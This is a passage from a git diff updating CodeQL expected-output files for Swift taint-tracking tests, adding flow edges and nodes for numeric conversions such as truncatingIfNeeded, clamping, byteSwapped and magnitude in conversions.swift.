SSA def(v5) | conversions.swift:69:12:69:12 | v5 | | conversions.swift:68:6:68:6 | v5 | conversions.swift:68:6:68:6 | SSA def(v5) | | conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:68:6:68:6 | v5 | +| conversions.swift:68:36:68:55 | call to sourceInt(_:) | conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:71:6:71:6 | SSA def(v6) | conversions.swift:72:12:72:12 | v6 | | conversions.swift:71:6:71:6 | v6 | conversions.swift:71:6:71:6 | SSA def(v6) | | conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | conversions.swift:71:6:71:6 | v6 | +| conversions.swift:71:28:71:47 | call to sourceInt(_:) | conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | | conversions.swift:74:6:74:6 | SSA def(v7) | conversions.swift:75:12:75:12 | v7 | | conversions.swift:74:6:74:6 | v7 | conversions.swift:74:6:74:6 | SSA def(v7) | | conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:74:6:74:6 | v7 | @@ -64,13 +76,25 @@ | conversions.swift:78:12:78:12 | [post] v8 | conversions.swift:79:12:79:12 | v8 | | conversions.swift:78:12:78:12 | v8 | conversions.swift:79:12:79:12 | v8 | | conversions.swift:79:12:79:12 | [post] v8 | conversions.swift:80:12:80:12 | v8 | +| conversions.swift:79:12:79:12 | v8 | conversions.swift:79:12:79:29 | call to advanced(by:) | | conversions.swift:79:12:79:12 | v8 | conversions.swift:80:12:80:12 | v8 | +| conversions.swift:79:28:79:28 | 1 | conversions.swift:79:12:79:29 | call to advanced(by:) | | conversions.swift:80:12:80:12 | [post] v8 | conversions.swift:81:12:81:12 | v8 | +| conversions.swift:80:12:80:12 | v8 | conversions.swift:80:12:80:48 | call to advanced(by:) | | conversions.swift:80:12:80:12 | v8 | conversions.swift:81:12:81:12 | v8 | +| conversions.swift:80:28:80:47 | call to sourceInt(_:) | conversions.swift:80:12:80:48 | call to advanced(by:) | | conversions.swift:81:12:81:12 | [post] v8 | conversions.swift:82:12:82:12 | v8 | +| conversions.swift:81:12:81:12 | v8 | conversions.swift:81:12:81:29 | call to distance(to:) | | conversions.swift:81:12:81:12 | v8 | conversions.swift:82:12:82:12 | v8 | +| conversions.swift:81:28:81:28 | 1 | conversions.swift:81:12:81:29 | call to distance(to:) | +| conversions.swift:82:12:82:12 | v8 | conversions.swift:82:12:82:51 | call to distance(to:) | +| conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | conversions.swift:82:12:82:51 | call to distance(to:) | | conversions.swift:84:12:84:45 | call to Self.init(exactly:) | conversions.swift:84:12:84:46 | ...! | | conversions.swift:85:12:85:48 | call to Self.init(exactly:) | conversions.swift:85:12:85:49 | ...! | +| conversions.swift:86:26:86:45 | call to sourceInt(_:) | conversions.swift:86:12:86:46 | call to Self.init(clamping:) | +| conversions.swift:87:29:87:48 | call to sourceInt(_:) | conversions.swift:87:12:87:49 | call to Self.init(clamping:) | +| conversions.swift:88:36:88:55 | call to sourceInt(_:) | conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:89:39:89:58 | call to sourceInt(_:) | conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) | conversions.swift:90:12:90:51 | ...! | | conversions.swift:91:12:91:53 | call to Self.init(_:radix:) | conversions.swift:91:12:91:54 | ...! | | conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | @@ -122,6 +146,7 @@ | conversions.swift:131:12:131:12 | [post] pair4 | conversions.swift:132:12:132:12 | pair4 | | conversions.swift:131:12:131:12 | pair4 | conversions.swift:132:12:132:12 | pair4 | | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | +| conversions.swift:138:18:138:39 | call to sourceFloat(_:) | conversions.swift:138:12:138:40 | call to UInt8.init(_:) | | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | | conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to String.init(_:) | @@ -144,6 +169,10 @@ | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | +| conversions.swift:158:12:158:32 | call to sourceUInt(_:) | conversions.swift:158:12:158:34 | .byteSwapped | +| conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | conversions.swift:159:12:159:36 | .byteSwapped | +| conversions.swift:160:12:160:31 | call to sourceInt(_:) | conversions.swift:160:12:160:33 | .magnitude | +| conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | conversions.swift:161:12:161:37 | .magnitude | | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | | conversions.swift:168:6:168:6 | SSA def(ms1) | conversions.swift:169:12:169:12 | ms1 | | conversions.swift:168:6:168:6 | ms1 | conversions.swift:168:6:168:6 | SSA def(ms1) | @@ -186,6 +215,8 @@ | conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | | conversions.swift:187:12:187:12 | [post] v3 | conversions.swift:188:12:188:12 | v3 | | conversions.swift:187:12:187:12 | v3 | conversions.swift:188:12:188:12 | v3 | +| conversions.swift:195:24:195:24 | myCEnumConst | conversions.swift:195:12:195:36 | call to Self.init(_:) | +| conversions.swift:196:24:196:41 | call to sourceInt(_:) | conversions.swift:196:12:196:42 | call to Self.init(_:) | | conversions.swift:199:7:199:7 | SSA def(self) | conversions.swift:199:7:199:7 | self[return] | | conversions.swift:199:7:199:7 | self | conversions.swift:199:7:199:7 | SSA def(self) | | conversions.swift:200:2:200:2 | SSA def(self) | conversions.swift:200:2:221:2 | self[return] | @@ -248,6 +279,7 @@ | conversions.swift:236:13:236:13 | withUInt | conversions.swift:237:14:237:14 | withUInt | | conversions.swift:237:3:237:22 | SSA def(self) | conversions.swift:238:12:238:12 | self | | conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:237:3:237:22 | SSA def(self) | +| conversions.swift:237:14:237:14 | withUInt | conversions.swift:237:10:237:22 | call to Self.init(_:) | | conversions.swift:238:12:238:12 | [post] self | conversions.swift:235:2:239:2 | self[return] | | conversions.swift:238:12:238:12 | self | conversions.swift:235:2:239:2 | self[return] | | conversions.swift:241:7:241:20 | SSA def(withMyValue) | conversions.swift:242:13:242:13 | withMyValue | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index e7dc06ad325..7563f217355 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected @@ -1,4 +1,14 @@ edges +| conversions.swift:33:16:33:35 | call to sourceInt(_:) | conversions.swift:33:12:33:36 | call to Self.init(_:) | provenance | | +| conversions.swift:34:17:34:36 | call to sourceInt(_:) | conversions.swift:34:12:34:37 | call to Self.init(_:) | provenance | | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Self.init(_:) | provenance | | +| conversions.swift:36:18:36:37 | call to sourceInt(_:) | conversions.swift:36:12:36:38 | call to Self.init(_:) | provenance | | +| conversions.swift:37:18:37:37 | call to sourceInt(_:) | conversions.swift:37:12:37:38 | call to Self.init(_:) | provenance | | +| conversions.swift:39:17:39:36 | call to sourceInt(_:) | conversions.swift:39:12:39:37 | call to Self.init(_:) | provenance | | +| conversions.swift:40:18:40:37 | call to sourceInt(_:) | conversions.swift:40:12:40:38 | call to Self.init(_:) | provenance | | +| conversions.swift:41:19:41:39 | call to sourceInt(_:) | conversions.swift:41:12:41:40 | call to Self.init(_:) | provenance | | +| conversions.swift:42:19:42:39 | call to sourceInt(_:) | conversions.swift:42:12:42:40 | call to Self.init(_:) | provenance | | +| conversions.swift:43:19:43:39 | call to sourceInt(_:) | conversions.swift:43:12:43:40 | call to Self.init(_:) | provenance | | | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | provenance | | | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | provenance | | | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | provenance | | @@ -23,8 +33,22 @@ edges | conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:62:18:62:50 | call to numericCast(_:) | provenance | | | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | conversions.swift:66:12:66:12 | v4 | provenance | | | conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | provenance | | +| conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:69:12:69:12 | v5 | provenance | | +| conversions.swift:68:36:68:55 | call to sourceInt(_:) | conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | provenance | | +| conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | conversions.swift:72:12:72:12 | v6 | provenance | | +| conversions.swift:71:28:71:47 | call to sourceInt(_:) | conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | provenance | | | conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:75:12:75:12 | v7 | provenance | | | conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:74:11:74:35 | call to abs(_:) | provenance | | +| conversions.swift:80:28:80:47 | call to sourceInt(_:) | conversions.swift:80:12:80:48 | call to advanced(by:) | provenance | | +| conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | conversions.swift:82:12:82:51 | call to distance(to:) | provenance | | +| conversions.swift:84:12:84:45 | call to Self.init(exactly:) [some:0] | conversions.swift:84:12:84:46 | ...! | provenance | | +| conversions.swift:84:25:84:44 | call to sourceInt(_:) | conversions.swift:84:12:84:45 | call to Self.init(exactly:) [some:0] | provenance | | +| conversions.swift:85:12:85:48 | call to Self.init(exactly:) [some:0] | conversions.swift:85:12:85:49 | ...! | provenance | | +| conversions.swift:85:28:85:47 | call to sourceInt(_:) | conversions.swift:85:12:85:48 | call to Self.init(exactly:) [some:0] | provenance | | +| conversions.swift:86:26:86:45 | call to sourceInt(_:) | conversions.swift:86:12:86:46 | call to Self.init(clamping:) | provenance | | +| conversions.swift:87:29:87:48 | call to sourceInt(_:) | conversions.swift:87:12:87:49 | call to Self.init(clamping:) | provenance | | +| conversions.swift:88:36:88:55 | call to sourceInt(_:) | conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | provenance | | +| conversions.swift:89:39:89:58 | call to sourceInt(_:) | conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | provenance | | | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:90:12:90:51 | ...! | provenance | | | conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | provenance | | | conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | conversions.swift:91:12:91:54 | ...! | provenance | | @@ -38,6 +62,7 @@ edges | conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | provenance | | | conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | provenance | | | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | provenance | | +| conversions.swift:138:18:138:39 | call to sourceFloat(_:) | conversions.swift:138:12:138:40 | call to UInt8.init(_:) | provenance | | | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | provenance | | | conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | provenance | | | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to String.init(_:) | provenance | | @@ -57,6 +82,10 @@ edges | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | provenance | | | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | provenance | | | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | provenance | | +| conversions.swift:158:12:158:32 | call to sourceUInt(_:) | conversions.swift:158:12:158:34 | .byteSwapped | provenance | | +| conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | conversions.swift:159:12:159:36 | .byteSwapped | provenance | | +| conversions.swift:160:12:160:31 | call to sourceInt(_:) | conversions.swift:160:12:160:33 | .magnitude | provenance | | +| conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | conversions.swift:161:12:161:37 | .magnitude | provenance | | | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | provenance | | | conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | provenance | | | conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:175:12:175:12 | ms2 | provenance | | @@ -73,6 +102,7 @@ edges | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:187:12:187:12 | v3 | provenance | | | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:188:12:188:12 | v3 | provenance | | | conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | provenance | | +| conversions.swift:196:24:196:41 | call to sourceInt(_:) | conversions.swift:196:12:196:42 | call to Self.init(_:) | provenance | | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | provenance | | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | provenance | | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:208:25:208:25 | arr1 | provenance | | @@ -104,6 +134,10 @@ edges | conversions.swift:230:3:230:3 | [post] self [v] | conversions.swift:229:2:231:2 | self[return] [v] | provenance | | | conversions.swift:230:12:230:12 | v | conversions.swift:230:3:230:3 | [post] self [v] | provenance | | | conversions.swift:235:7:235:17 | withUInt | conversions.swift:236:13:236:13 | withUInt | provenance | | +| conversions.swift:235:7:235:17 | withUInt | conversions.swift:237:14:237:14 | withUInt | provenance | | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:235:2:239:2 | self[return] | provenance | | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:238:12:238:12 | self | provenance | | +| conversions.swift:237:14:237:14 | withUInt | conversions.swift:237:10:237:22 | call to Self.init(_:) | provenance | | | conversions.swift:241:7:241:20 | withMyValue [v] | conversions.swift:242:13:242:13 | withMyValue [v] | provenance | | | conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | | conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:242:13:242:25 | .v | provenance | | @@ -122,6 +156,7 @@ edges | conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | | conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:256:10:256:22 | .v | provenance | | | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:235:7:235:17 | withUInt | provenance | | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | provenance | | | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | conversions.swift:241:7:241:20 | withMyValue [v] | provenance | | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | provenance | | @@ -217,6 +252,26 @@ edges | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes | conversions.swift:32:12:32:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:33:12:33:36 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:33:16:33:35 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:34:12:34:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:34:17:34:36 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:35:12:35:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:36:12:36:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:36:18:36:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:37:12:37:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:37:18:37:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:39:12:39:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:39:17:39:36 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:40:12:40:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:40:18:40:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:41:12:41:40 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:41:19:41:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:42:12:42:40 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:42:19:42:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:43:12:43:40 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:43:19:43:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:45:12:45:39 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:45:18:45:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:46:12:46:40 | call to Double.init(_:) | semmle.label | call to Double.init(_:) | @@ -251,9 +306,33 @@ nodes | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | | conversions.swift:65:31:65:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:66:12:66:12 | v4 | semmle.label | v4 | +| conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:68:36:68:55 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:69:12:69:12 | v5 | semmle.label | v5 | +| conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | semmle.label | call to UInt.init(bitPattern:) | +| conversions.swift:71:28:71:47 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:72:12:72:12 | v6 | semmle.label | v6 | | conversions.swift:74:11:74:35 | call to abs(_:) | semmle.label | call to abs(_:) | | conversions.swift:74:15:74:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:75:12:75:12 | v7 | semmle.label | v7 | +| conversions.swift:80:12:80:48 | call to advanced(by:) | semmle.label | call to advanced(by:) | +| conversions.swift:80:28:80:47 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:82:12:82:51 | call to distance(to:) | semmle.label | call to distance(to:) | +| conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:84:12:84:45 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | +| conversions.swift:84:12:84:46 | ...! | semmle.label | ...! | +| conversions.swift:84:25:84:44 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:85:12:85:48 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | +| conversions.swift:85:12:85:49 | ...! | semmle.label | ...! | +| conversions.swift:85:28:85:47 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:86:12:86:46 | call to Self.init(clamping:) | semmle.label | call to Self.init(clamping:) | +| conversions.swift:86:26:86:45 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:87:12:87:49 | call to Self.init(clamping:) | semmle.label | call to Self.init(clamping:) | +| conversions.swift:87:29:87:48 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:88:36:88:55 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:89:39:89:58 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | | conversions.swift:90:12:90:51 | ...! | semmle.label | ...! | | conversions.swift:90:16:90:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | @@ -279,6 +358,8 @@ nodes | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | | conversions.swift:137:12:137:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:138:12:138:40 | call to UInt8.init(_:) | semmle.label | call to UInt8.init(_:) | +| conversions.swift:138:18:138:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | | conversions.swift:139:12:139:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | | conversions.swift:140:12:140:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | @@ -314,6 +395,14 @@ nodes | conversions.swift:156:12:156:36 | .exponent | semmle.label | .exponent | | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | | conversions.swift:157:12:157:36 | .significand | semmle.label | .significand | +| conversions.swift:158:12:158:32 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | +| conversions.swift:158:12:158:34 | .byteSwapped | semmle.label | .byteSwapped | +| conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:159:12:159:36 | .byteSwapped | semmle.label | .byteSwapped | +| conversions.swift:160:12:160:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:160:12:160:33 | .magnitude | semmle.label | .magnitude | +| conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:161:12:161:37 | .magnitude | semmle.label | .magnitude | | conversions.swift:165:12:165:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | | conversions.swift:166:12:166:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:166:19:166:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | @@ -331,6 +420,8 @@ nodes | conversions.swift:186:40:186:40 | parent | semmle.label | parent | | conversions.swift:187:12:187:12 | v3 | semmle.label | v3 | | conversions.swift:188:12:188:12 | v3 | semmle.label | v3 | +| conversions.swift:196:12:196:42 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:196:24:196:41 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | | conversions.swift:202:14:202:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | | conversions.swift:202:15:202:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | @@ -364,8 +455,12 @@ nodes | conversions.swift:229:7:229:12 | v | semmle.label | v | | conversions.swift:230:3:230:3 | [post] self [v] | semmle.label | [post] self [v] | | conversions.swift:230:12:230:12 | v | semmle.label | v | +| conversions.swift:235:2:239:2 | self[return] | semmle.label | self[return] | | conversions.swift:235:7:235:17 | withUInt | semmle.label | withUInt | | conversions.swift:236:13:236:13 | withUInt | semmle.label | withUInt | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:237:14:237:14 | withUInt | semmle.label | withUInt | +| conversions.swift:238:12:238:12 | self | semmle.label | self | | conversions.swift:241:7:241:20 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:242:13:242:13 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:242:13:242:25 | .v | semmle.label | .v | @@ -381,6 +476,7 @@ nodes | conversions.swift:255:13:255:25 | .v | semmle.label | .v | | conversions.swift:256:10:256:10 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:256:10:256:22 | .v | semmle.label | .v | +| conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | semmle.label | call to Int.init(withUInt:) | | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | @@ -520,6 +616,7 @@ subpaths | conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:249:11:249:24 | .v | | conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:255:13:255:25 | .v | | conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:256:10:256:22 | .v | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:235:7:235:17 | withUInt | conversions.swift:235:2:239:2 | self[return] | conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:247:2:252:2 | self[return] | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | @@ -534,6 +631,16 @@ subpaths | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | result | +| conversions.swift:33:12:33:36 | call to Self.init(_:) | conversions.swift:33:16:33:35 | call to sourceInt(_:) | conversions.swift:33:12:33:36 | call to Self.init(_:) | result | +| conversions.swift:34:12:34:37 | call to Self.init(_:) | conversions.swift:34:17:34:36 | call to sourceInt(_:) | conversions.swift:34:12:34:37 | call to Self.init(_:) | result | +| conversions.swift:35:12:35:38 | call to Self.init(_:) | conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Self.init(_:) | result | +| conversions.swift:36:12:36:38 | call to Self.init(_:) | conversions.swift:36:18:36:37 | call to sourceInt(_:) | conversions.swift:36:12:36:38 | call to Self.init(_:) | result | +| conversions.swift:37:12:37:38 | call to Self.init(_:) | conversions.swift:37:18:37:37 | call to sourceInt(_:) | conversions.swift:37:12:37:38 | call to Self.init(_:) | result | +| conversions.swift:39:12:39:37 | call to Self.init(_:) | conversions.swift:39:17:39:36 | call to sourceInt(_:) | conversions.swift:39:12:39:37 | call to Self.init(_:) | result | +| conversions.swift:40:12:40:38 | call to Self.init(_:) | conversions.swift:40:18:40:37 | call to sourceInt(_:) | conversions.swift:40:12:40:38 | call to Self.init(_:) | result | +| conversions.swift:41:12:41:40 | call to Self.init(_:) | conversions.swift:41:19:41:39 | call to sourceInt(_:) | conversions.swift:41:12:41:40 | call to Self.init(_:) | result | +| conversions.swift:42:12:42:40 | call to Self.init(_:) | conversions.swift:42:19:42:39 | call to sourceInt(_:) | conversions.swift:42:12:42:40 | call to Self.init(_:) | result | +| conversions.swift:43:12:43:40 | call to Self.init(_:) | conversions.swift:43:19:43:39 | call to sourceInt(_:) | conversions.swift:43:12:43:40 | call to Self.init(_:) | result | | conversions.swift:45:12:45:39 | call to Float.init(_:) | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | result | | 